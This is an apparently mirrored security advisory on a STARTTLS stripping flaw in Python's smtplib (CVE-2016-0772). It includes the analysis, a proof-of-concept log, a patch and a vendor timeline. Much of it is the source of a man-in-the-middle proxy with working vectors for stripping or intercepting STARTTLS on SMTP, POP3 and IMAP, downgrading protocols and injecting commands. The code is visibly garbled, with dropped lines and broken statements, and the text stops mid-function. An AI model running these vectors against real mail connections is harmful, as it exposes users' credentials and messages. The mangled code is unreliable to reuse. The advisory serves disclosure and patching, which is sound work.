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HistoryJul 03, 2016 - 12:00 a.m.

Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping


6.5 Medium


Attack Vector


Attack Complexity


Privileges Required


User Interaction




Confidentiality Impact


Integrity Impact


Availability Impact



5.8 Medium


Access Vector


Access Complexity




Confidentiality Impact


Integrity Impact


Availability Impact



Python smtplib 2.7.11 3.4.4 3.5.1 - Man In The Middle StartTLS Stripping


	Author:		<>
	Version: 	0.2
	Date: 		Nov 25th, 2015
	Tag:		python smtplib starttls stripping (mitm)


	Name:			python 
	Vendor:			python software foundation
	References:		* [1]
	Version:		2.7.11, 3.4.4, 3.5.1
	Latest Version:	2.7.11, 3.4.4, 3.5.1 [2]
	Other Versions:	2.2 [3] (~14 years ago) <= affected <= 2.7.11
					3.0 [3] (~7  years ago) <= affected <= 3.4.4
	Platform(s):	cross
	Technology:		c/python

	Vuln Classes:	Selection of Less-Secure Algorithm During Negotiation (CWE-757)
	Origin:			remote/mitm
	Min. Privs.:	-

	CVE:			CVE-2016-0772


quote wikipedia [4]

>Python is a widely used high-level, general-purpose, interpreted, dynamic programming language. Its design philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C++ or Java.[24][25] The language provides constructs intended to enable clear programs on both a small and large scale.


python smtplib does not seem to raise an exception when the remote 
end (smtp server) is capable of negotiating starttls (as seen in the 
response to ehlo) but fails to respond with 220 (ok) to an explicit 
call of `SMTP.starttls()`. This may allow a malicious mitm to perform a 
starttls stripping attack if the client code does not explicitly check 
the response code for starttls, which is rarely done as one might 
expect that it raises an exception when starttls negotiation fails 
(like when calling starttls on a server that does not support it or 
when it fails to negotiate tls due to an ssl exception/cipher 
mismatch/auth fail).

Quoting the PSRT with an extended analysis

> It is a surprising and potential dangerous behavior. It also violates Python's documentation. states that all SMTP commands after starttls() are encrypted. That's clearly not true in case of response != 200. I also had a look how the other stdlib libraries handle starttls problems. nntplib's and imaplib's starttls() method raise an error when the starttls handshake fails.

Checking on how `smtplib.starttls()` is actually being used by open-source projects underlines that `smtplib.starttls()` is generally expected to throw an exception if the starttls protocol was not executed correctly. Therefore this issue may have an impact on some major projects like Django, web2py. Apart from that the current `smtplib.starttls()` behavior is different to `nntplib.starttls()`, `imaplib.starttls()`

PoC see [6]
patch attached.


The vulnerable code is located in `lib/` [3] line 646 (2.7 branch) and 
fails to raise an exception if `resp!=220`.

The documentation [7] suggests that `starttls()` either encrypts all communication
or throws an exception if it was not able to negotiate tls.

	SMTP.starttls([keyfile[, certfile]])
	Put the SMTP connection in TLS (Transport Layer Security) mode. All SMTP commands that follow will be encrypted. You should then call ehlo() again.
	If keyfile and certfile are provided, these are passed to the socket module�s ssl() function.
	If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first.
	Changed in version 2.6.
	The server didn�t reply properly to the HELO greeting.
	The server does not support the STARTTLS extension.
	Changed in version 2.6.
	SSL/TLS support is not available to your Python interpreter.

Code `lib/`:

Inline annotations are prefixed with `//#!`

	    def starttls(self, keyfile=None, certfile=None):
	        """Puts the connection to the SMTP server into TLS mode.
	        If there has been no previous EHLO or HELO command this session, this
	        method tries ESMTP EHLO first.
	        If the server supports TLS, this will encrypt the rest of the SMTP
	        session. If you provide the keyfile and certfile parameters,
	        the identity of the SMTP server and client can be checked. This,
	        however, depends on whether the socket module really checks the
	        This method may raise the following exceptions:
	         SMTPHeloError            The server didn't reply properly to
	                                  the helo greeting.
	        if not self.has_extn("starttls"):
	            raise SMTPException("STARTTLS extension not supported by server.")
	        (resp, reply) = self.docmd("STARTTLS")
	        if resp == 220:														//#! with a server not responding 220 it wont even try to negotiate tls
	            if not _have_ssl:												//#! silently stays unencrypted
	                raise RuntimeError("No SSL support included in this Python")
	            self.sock = ssl.wrap_socket(self.sock, keyfile, certfile)
	            self.file = SSLFakeFile(self.sock)
	            # RFC 3207:
	            # The client MUST discard any knowledge obtained from
	            # the server, such as the list of SMTP service extensions,
	            # which was not obtained from the TLS negotiation itself.
	            self.helo_resp = None
	            self.ehlo_resp = None
	            self.esmtp_features = {}
	            self.does_esmtp = 0
	        return (resp, reply)												//#! to actually detect this a client would have to manually check resp==220
																				//#! or that the socket was turned into an SSLSock object

Proof of Concept

1. start `` proxy

		#> python striptls/ -l -r remote.mailserver.tld:25 -x SMTP.StripWithInvalidResponseCode
		  - INFO     - <Proxy 0x1f04910 listen=('', 9999) target=('remote.mailserver.tld', 25)> ready.
		  - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithInvalidResponseCode at 0x020F85E0>
		  - INFO     - <RewriteDispatcher vectors={25: set([<class __main__.StripWithInvalidResponseCode at 0x020F85E0>])}>

2. send mail using `smtplib` (starttls)

		import smtplib
		server = smtplib.SMTP('localhost', port=9999)
		print server.esmtp_features
		server.sendmail("[email protected]", "[email protected]", "From: [email protected]\r\nTo: [email protected]\r\n\r\n")

3. watch `` fake the server response with `resp=200` instead of `resp=220`, not forwarding the message to the server. This effectively strips starttls. `smtplib` keeps sending in plaintext with no indication to the client code that starttls negotiation actually failed.

		  - DEBUG    - <ProtocolDetect 0x1f25530 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
		  - INFO     - <Session 0x1f0ea50> client ('', 59687) has connected
		  - INFO     - <Session 0x1f0ea50> connecting to target ('remote.mailserver.tld', 25)
		  - DEBUG    - <Session 0x1f0ea50> [client] <= [server]          '220 mailserver.tld (msrv002) Nemesis ESMTP Service ready\r\n'
		  - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.StripWithInvalidResponseCode new: True>
		  - DEBUG    - <Session 0x1f0ea50> [client] => [server]          'ehlo []\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] <= [server]          ' Hello [] [x.x.x.x]\r\n250-SIZE 3	1457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] => [server]          'STARTTLS\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] <= [server][mangled] '200 STRIPTLS\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] => [server][mangled] None
		  - DEBUG    - <Session 0x1f0ea50> [client] => [server]          'mail FROM:<[email protected]> size=10\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] <= [server]          '530 Authentication required\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] => [server]          'rset\r\n'
		  - DEBUG    - <Session 0x1f0ea50> [client] <= [server]          '250 OK\r\n'
		  - WARNING  - <Session 0x1f0ea50> terminated.


* raise an exception if the server replies with an unexpected return-code to an explicit call for `smtplib.starttls()`.
		# <master> diff --git a/Lib/ b/Lib/ index 4756973..dfbf5f9 100755
		--- a/Lib/
		+++ b/Lib/
		@@ -773,6 +773,11 @@ class SMTP:
		             self.ehlo_resp = None
		             self.esmtp_features = {}
		             self.does_esmtp = 0
		+        else:
		+            # RFC 3207:
		+            # 501 Syntax error (no parameters allowed)
		+            # 454 TLS not available due to temporary reason
		+            raise SMTPResponseException(resp, reply)
		         return (resp, reply)
		     def sendmail(self, from_addr, to_addrs, msg, mail_options=[],


Vendor response: see [8,9,10]

	11/25/2015	contact psrt; provided details, PoC, proposed patch
	12/01/2016	response, initial analysis
	01/29/2016	request ETA, bugref
	02/01/2016	psrt assigned CVE-2016-0772
	02/12/2016	response: will be addressed in upcoming 2.7, 3.5
	02/13/2016  request ETA; response: no exact date
	03/29/2016	request ETA; response: generic bounce message
	05/12/2016  request ETA; no response
	05/27/2016  request ETA; response: no exact date
	06/12/2016  request ETA;
	06/14/2016	response: ETA ~ June 26th
	06/14/2016  vendor announcement [9]



#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <>
# see:
#          pip install striptls
                  inbound                    outbound
import sys
import os
import logging
import socket
import select
import ssl
import time
import re

logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)-8s - %(message)s')
logger = logging.getLogger(__name__)

class SessionTerminatedException(Exception):pass
class ProtocolViolationException(Exception):pass

class TcpSockBuff(object):
    ''' Wrapped Tcp Socket with access to last sent/received data '''
    def __init__(self, sock, peer=None):
        self.socket = None
        self.socket_ssl = None
        self.recvbuf = ''
        self.sndbuf = ''
        self.peer = peer
    def _init(self, sock):
        self.socket = sock
    def connect(self, target=None):
        target = target or self.peer
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return self.socket.connect(target)
    def accept(self):
        return self.socket.accept()
    def recv(self, buflen=8*1024, *args, **kwargs):
        if self.socket_ssl:
            chunks = []
            chunk = True
            data_pending = buflen
            while chunk and data_pending:
                chunk =
                data_pending = self.socket_ssl.pending()
            self.recvbuf = ''.join(chunks)
            self.recvbuf = self.socket.recv(buflen, *args, **kwargs)
        return self.recvbuf
    def recv_blocked(self, buflen=8*1024, timeout=None, *args, **kwargs):
        force_first_loop_iteration = True
        end = time.time()+timeout if timeout else 0
        while force_first_loop_iteration or (not timeout or time.time()<end):
            # force one recv otherwise we might not even try to read if timeout is too narrow
                return self.recv(buflen=buflen, *args, **kwargs)
            except ssl.SSLWantReadError:
            force_first_loop_iteration = False
    def send(self, data, retransmit_delay=0.1):
        if self.socket_ssl:
            last_exception = None
            for _ in xrange(3):
                    last_exception = None
                except ssl.SSLWantWriteError,swwe:
                    logger.warning("TCPSockBuff: ssl.sock not yet ready, retransmit (%d) in %f seconds: %s"%(_,retransmit_delay,repr(swwe)))
                    last_exception = swwe
            if last_exception:
                raise last_exception
        self.sndbuf = data
    def sendall(self, data):
        if self.socket_ssl:
        self.sndbuf = data
    def ssl_wrap_socket(self, *args, **kwargs):
        if len(args)>=1:
            args[1] = self.socket
        if 'sock' in kwargs:
            kwargs['sock'] = self.socket
        if not args and not kwargs.get('sock'):
            kwargs['sock'] = self.socket
        self.socket_ssl = ssl.wrap_socket(*args, **kwargs)
        self.socket_ssl.setblocking(0) # nonblocking for select
    def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs):
        if len(args)>=1:
            args[1] = self.socket
        if 'sock' in kwargs:
            kwargs['sock'] = self.socket
        if not args and not kwargs.get('sock'):
            kwargs['sock'] = self.socket
        self.socket_ssl = ctx.wrap_socket(*args, **kwargs)
        self.socket_ssl.setblocking(0) # nonblocking for select
class ProtocolDetect(object):
    PROTO_SMTP = 25
    PROTO_XMPP = 5222
    PROTO_IMAP = 143
    PROTO_FTP = 21
    PROTO_POP3 = 110
    PROTO_NNTP = 119
    PROTO_IRC = 6667
    PROTO_ACAP = 675
    PROTO_SSL = 443
               110: PROTO_POP3,
               143: PROTO_IMAP,
               21: PROTO_FTP,
               119: PROTO_NNTP,
               6667: PROTO_IRC,
               675: PROTO_ACAP
    KEYWORDS = ((['ehlo', 'helo','starttls','rcpt to:','mail from:'], PROTO_SMTP),
                (['xmpp'], PROTO_XMPP),
                (['. capability'], PROTO_IMAP),
                (['auth tls'], PROTO_FTP)
    def __init__(self, target=None):
        self.protocol_id = None
        self.history = []
        if target:
            self.protocol_id = self.PORTMAP.get(target[1])
            if self.protocol_id:
                logger.debug("%s - protocol detected (target port)"%repr(self))
    def __str__(self):
        return repr(self.proto_id_to_name(self.protocol_id))
    def __repr__(self):
        return "<ProtocolDetect %s protocol_id=%s len_history=%d>"%(hex(id(self)), self.proto_id_to_name(self.protocol_id), len(self.history))
    def proto_id_to_name(self, id):
        if not id:
            return id
        for p in (a for a in dir(self) if a.startswith("PROTO_")):
            if getattr(self, p)==id:
                return p   

    def detect_peek_tls(self, sock):
        if sock.socket_ssl:
            raise Exception("SSL Detection for ssl socket ..whut!")
        TLS_VERSIONS = {
            # SSL
            # TLS
        SSLv2_PREAMBLE = 0x80
        peek_bytes = sock.recv(5, socket.MSG_PEEK)
        if not len(peek_bytes)==5:
        # detect sslv2, sslv3, tls: one symbol is one byte;  T .. type
        #                                                    L .. length 
        #                                                    V .. version
        #               01234
        # detect sslv2  LLTVV                T=0x01 ... MessageType.client_hello; L high bit set.
        #        sslv3  TVVLL      
        #        tls    TVVLL                T=0x16 ... ContentType.Handshake
        v = None
        if ord(peek_bytes[0]) & SSLv2_PREAMBLE \
            and peek_bytes[2]==SSLv2_CONTENT_TYPE_CLIENT_HELLO \
            and peek_bytes[3:3+2] in TLS_VERSIONS.keys():
            v = TLS_VERSIONS.get(peek_bytes[3:3+2])
  "ProtocolDetect: SSL23/TLS version: %s"%v)
        elif peek_bytes[0] == TLS_CONTENT_TYPE_HANDSHAKE \
            and peek_bytes[1:1+2] in TLS_VERSIONS.keys():
            v = TLS_VERSIONS.get(peek_bytes[1:1+2])  
  "ProtocolDetect: TLS version: %s"%v)
        return v

    def detect(self, data):
        if self.protocol_id:
            return self.protocol_id
        for keywordlist,proto in self.KEYWORDS:
            if any(k in data.lower() for k in keywordlist):
                self.protocol_id = proto
                logger.debug("%s - protocol detected (protocol messages)"%repr(self))
class Session(object):
    ''' Proxy session from client <-> proxy <-> server 
        @param inbound: inbound socket
        @param outbound: outbound socket
        @param target: target tuple ('ip',port) 
        @param buffer_size: socket buff size'''
    def __init__(self, proxy, inbound=None, outbound=None, target=None, buffer_size=4096):
        self.proxy = proxy
        self.bind = proxy.getsockname()
        self.inbound = TcpSockBuff(inbound)
        self.outbound = TcpSockBuff(outbound, peer=target)
        self.buffer_size = buffer_size
        self.protocol = ProtocolDetect(target=target)
        self.datastore = {}
    def __repr__(self):
        return "<Session %s [client: %s] --> [prxy: %s] --> [target: %s]>"%(hex(id(self)),
    def __str__(self):
        return "<Session %s>"%hex(id(self))
    def connect(self, target):
        self.outbound.peer = target"%s connecting to target %s"%(self, repr(target)))
        return self.outbound.connect(target)
    def accept(self):
        sock, addr = self.proxy.accept()
        self.inbound = TcpSockBuff(sock)
        self.inbound.peer = addr"%s client %s has connected"%(self,repr(self.inbound.peer)))
        return sock,addr
    def get_peer_sockets(self):
        return [self.inbound.socket, self.outbound.socket]
    def notify_read(self, sock):
        if sock == self.proxy:
        elif sock == self.inbound.socket:
            # new client -> prxy - data
            self.on_recv_peek(self.inbound, self)
            self.on_recv(self.inbound, self.outbound, self)
        elif sock == self.outbound.socket:
            # new sprxy <- target - data
            self.on_recv(self.outbound, self.inbound, self)
    def close(self):
        except socket.error, se:
            logger.warning("session.close(): Exception: %s"%repr(se))
        raise SessionTerminatedException()
    def on_recv(self, s_in, s_out, session):
        data = s_in.recv(session.buffer_size)
        if not len(data):
            return session.close()
        if s_in == session.inbound:
            data = self.mangle_client_data(session, data)
        elif s_in == session.outbound:
            data = self.mangle_server_data(session, data)
        if data:
        return data
    def on_recv_peek(self, s_in, session): pass
    def mangle_client_data(self, session, data, rewrite): return data
    def mangle_server_data(self, session, data, rewrite): return data
class ProxyServer(object):
    '''Proxy Class'''
    def __init__(self, listen, target, buffer_size=4096, delay=0.0001):
        self.input_list = set([])
        self.sessions = {}  # sock:Session()
        self.callbacks = {} # name: [f,..]
        self.listen = listen = target
        self.buffer_size = buffer_size
        self.delay = delay
        self.bind = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.bind.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    def __str__(self):
        return "<Proxy %s listen=%s target=%s>"%(hex(id(self)),self.listen,

    def get_session_by_client_sock(self, sock):
        return self.sessions.get(sock)

    def set_callback(self, name, f):
        self.callbacks[name] = f

    def main_loop(self):
        while True:
            inputready, _, _ =, [], [])
            for sock in inputready:
                if not sock in self.input_list: 
                    # Check if inputready sock is still in the list of socks to read from
                    # as SessionTerminateException might remove multiple sockets from that list
                    # this might otherwise lead to bad FD access exceptions
                session = None
                    if sock == self.bind:
                        # on_accept
                        session = Session(sock,
                        for k,v in self.callbacks.iteritems():
                            setattr(session, k, v)
                        for s in session.get_peer_sockets():
                        # on_recv
                            session = self.get_session_by_client_sock(sock)
                        except ssl.SSLError, se:
                            if se.errno != ssl.SSL_ERROR_WANT_READ:
                        except SessionTerminatedException:
                            logger.warning("%s terminated."%session)
                except Exception, e:
                    logger.error("main: %s"%repr(e))
                    if isinstance(e,IOError):
                        for kname,value in ((a,getattr(Vectors,a)) for a in dir(Vectors) if a.startswith("_TLS_")):
                            if not os.path.isfile(value):
                                logger.error("%s = %s - file not found"%(kname, repr(value)))
                    if session:
                        logger.error("main: removing all sockets associated with session that raised exception: %s"%repr(session))
                        except SessionTerminatedException: pass
                    elif sock and sock!=self.bind:
                        # exception for non-bind socket - probably fine to close and remove it from our list
                        logger.error("main: removing socket that probably raised the exception")
                        # this is just super-fatal - something happened while processing our bind socket.

class Vectors:
    _TLS_CERTFILE = "server.pem"
    _TLS_KEYFILE = "server.pem"
    class GENERIC:
        _PROTO_ID = None
        class Intercept:
            proto independent msg_peek based tls interception
            def mangle_server_data(session, data, rewrite): return data
            def mangle_client_data(session, data, rewrite): return data
            def on_recv_peek(session, s_in):
                if s_in.socket_ssl:

                ssl_version = session.protocol.detect_peek_tls(s_in)
                if ssl_version:
          "SSL Handshake detected - performing ssl/tls conversion")
                        context = Vectors.GENERIC.Intercept.create_ssl_context()
                        session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                        logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                        session.outbound.ssl_wrap_socket_with_context(context, server_side=False)
                        logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                    except Exception, e:
                        logger.warning("Exception - not ssl intercepting outbound: %s"%repr(e))
            def create_ssl_context(proto=ssl.PROTOCOL_SSLv23, 
                protocols = protocols or ('PROTOCOL_SSLv3','PROTOCOL_TLSv1',
                options = options or ('OP_CIPHER_SERVER_PREFERENCE','OP_SINGLE_DH_USE',
                context = ssl.SSLContext(proto)
                context.verify_mode = verify_mode
                # reset protocol, options
                context.protocol = 0
                context.options = 0
                for p in protocols:
                    context.protocol |= getattr(ssl, p, 0)
                for o in options:
                    context.options |= getattr(ssl, o, 0)
                return context
        class InboundIntercept:
            proto independent msg_peek based tls interception
            def mangle_server_data(session, data, rewrite):
                # peek again - make sure to check for inbound ssl connections
                #  before forwarding data to the inbound channel
                # just in case server is faster with answer than client with hello
                #  likely if smtpd and striptls are running on the same segment
                #  and client is not.
                if not session.inbound.socket_ssl:
                    # only peek if inbound is not in tls mode yet
                    # kind of a hack but allow additional 0.1 secs for the client
                    #  to send its hello
                    Vectors.GENERIC.InterceptInbound.on_recv_peek(session, session.inbound)
                return data
            def mangle_client_data(session, data, rewrite): 
                return data
            def on_recv_peek(session, s_in):
                if s_in.socket_ssl:

                ssl_version = session.protocol.detect_peek_tls(s_in)
                if ssl_version:
          "SSL Handshake detected - performing ssl/tls conversion")
                        context = Vectors.GENERIC.Intercept.create_ssl_context()
                        session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                        logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    except Exception, e:
                        logger.warning("Exception - not ssl intercepting inbound: %s"%repr(e))
    class SMTP:
        _PROTO_ID = 25
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and "250" in data:
                    features = [f for f in data.strip().split('\r\n') if not "STARTTLS" in f]
                    if not features[-1].startswith("250 "):
                        features[-1] = features[-1].replace("250-","250 ")  # end marker
                    data = '\r\n'.join(features)+'\r\n' 
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class StripWithInvalidResponseCode:
            ''' 1) Force Server response to contain STARTTLS even though it does not support it (just because we can)
                2) Respond to client STARTTLS with invalid response code
            def mangle_server_data(session, data, rewrite):
                if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and "250" in data:
                    features = list(data.strip().split("\r\n"))
                    features.insert(-1,"250-STARTTLS")     # add STARTTLS from capabilities
                    #if "STARTTLS" in data:
                    #    features = [f for f in features if not "STARTTLS" in f]    # remove STARTTLS from capabilities
                    data = '\r\n'.join(features)+'\r\n' 
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    session.inbound.sendall("200 STRIPTLS\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("200 STRIPTLS\r\n")))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class StripWithTemporaryError:
            ''' 1) force server error on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    session.inbound.sendall("454 TLS not available due to temporary reason\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("454 TLS not available due to temporary reason\r\n")))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    session.inbound.sendall("501 Syntax error\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("501 Syntax error\r\n")))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    # do inbound STARTTLS
                    session.inbound.sendall("220 Go ahead\r\n")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("220 Go ahead\r\n")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if "220" not in resp_data:
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class InboundStarttlsProxy:
            ''' Inbound is starttls, outbound is plain
                1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                # keep track of stripped server ehlo/helo
                if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and "250" in data and not session.datastore.get("server_ehlo_stripped"): #only do this once
                    # wait for full line
                    while not "250 " in data:
                    features = [f for f in data.strip().split('\r\n') if not "STARTTLS" in f]
                    if features and not features[-1].startswith("250 "):
                        features[-1] = features[-1].replace("250-","250 ")  # end marker
                    # force starttls announcement
                    session.datastore['server_ehlo_stripped']= '\r\n'.join(features)+'\r\n' # stripped
                    if len(features)>1:
                        features.append("250 STARTTLS")
                        features[0]=features[0].replace("250 ","250-")
                    data = '\r\n'.join(features)+'\r\n' # forced starttls
                    session.datastore['server_ehlo'] = data
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    # do inbound STARTTLS
                    session.inbound.sendall("220 Go ahead\r\n")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("220 Go ahead\r\n")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # inbound ssl, fake server ehlo on helo/ehlo
                    indata = session.inbound.recv_blocked()
                    if not any(e in indata for e in ('ehlo','helo')):
                       raise ProtocolViolationException("whoop!? client did not send EHLO/HELO after STARTTLS finished.. proto violation: %s"%repr(indata))
                    logger.debug("%s [client] => [      ][mangled] %s"%(session,repr(indata)))
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr(session.datastore["server_ehlo_stripped"])))
                elif any(e in data for e in ('ehlo','helo')) and session.datastore.get("server_ehlo_stripped"):
                    # just do not forward the second ehlo/helo
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class ProtocolDowngradeStripExtendedMode:
            ''' Return error on EHLO to force peer to non-extended mode
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if data.lower().startswith("ehlo "):
                    session.inbound.sendall("502 Error: command \"EHLO\" not implemented\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("502 Error: command \"EHLO\" not implemented\r\n")))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
        class InjectCommand:
            ''' 1) Append command to STARTTLS\r\n.
                2) untrusted intercept to check if we get an invalid command response from server
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    data += "INJECTED_INVALID_COMMAND\r\n"
                    #logger.debug("%s [client] => [server][mangled] %s"%(session,repr(data)))
                        Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)
                    except ssl.SSLEOFError, se:
              "%s - Server failed to negotiate SSL with Exception: %s"%(session, repr(se))) 
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data
    class POP3:
        _PROTO_ID = 110

        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STLS support
                2) raise exception if client tries to negotiated STLS
            def mangle_server_data(session, data, rewrite):
                if data.lower().startswith('+ok capability'):
                    features = [f for f in data.strip().split('\r\n') if not "stls" in f.lower()]
                    data = '\r\n'.join(features)+'\r\n'
                return data
            def mangle_client_data(session, data, rewrite):
                if data.lower().startswith("stls"):
                    raise ProtocolViolationException("whoop!? client sent STLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif any(c in data.lower() for c in ('list','user ','pass ')):
                    rewrite.set_result(session, True)
                return data

        class StripWithError:
            ''' 1) force server error on client sending STLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "stls" == data.strip().lower():
                    session.inbound.sendall("-ERR unknown command\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("-ERR unknown command\r\n")))
                elif any(c in data.lower() for c in ('list','user ','pass ')):
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "stls"==data.strip().lower():
                    # do inbound STARTTLS
                    session.inbound.sendall("+OK Begin TLS negotiation\r\n")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("+OK Begin TLS negotiation\r\n")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if "+OK" not in resp_data:
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif any(c in data.lower() for c in ('list','user ','pass ')):
                    rewrite.set_result(session, True)
                return data
    class IMAP:
        _PROTO_ID = 143
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if "CAPABILITY " in data:
                    # rfc2595
                    data = data.replace(" STARTTLS","").replace(" LOGINDISABLED","")
                return data
            def mangle_client_data(session, data, rewrite):
                if " STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif " LOGIN " in data:
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending STLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if data.strip().lower().endswith("starttls"):
                    id = data.split(' ',1)[0].strip()
                    session.inbound.sendall("%s BAD unknown command\r\n"%id)
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("%s BAD unknown command\r\n"%id)))
                elif " LOGIN " in data:
                    rewrite.set_result(session, True)
                return data

        class ProtocolDowngradeToV2:
            ''' Return IMAP2 instead of IMAP4 in initial server response
            def mangle_server_data(session, data, rewrite):
                if all(kw.lower() in data.lower() for kw in ("IMAP4","* OK ")):
                    session.inbound.sendall("OK IMAP2 Server Ready\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("OK IMAP2 Server Ready\r\n")))
                return data
            def mangle_client_data(session, data, rewrite):
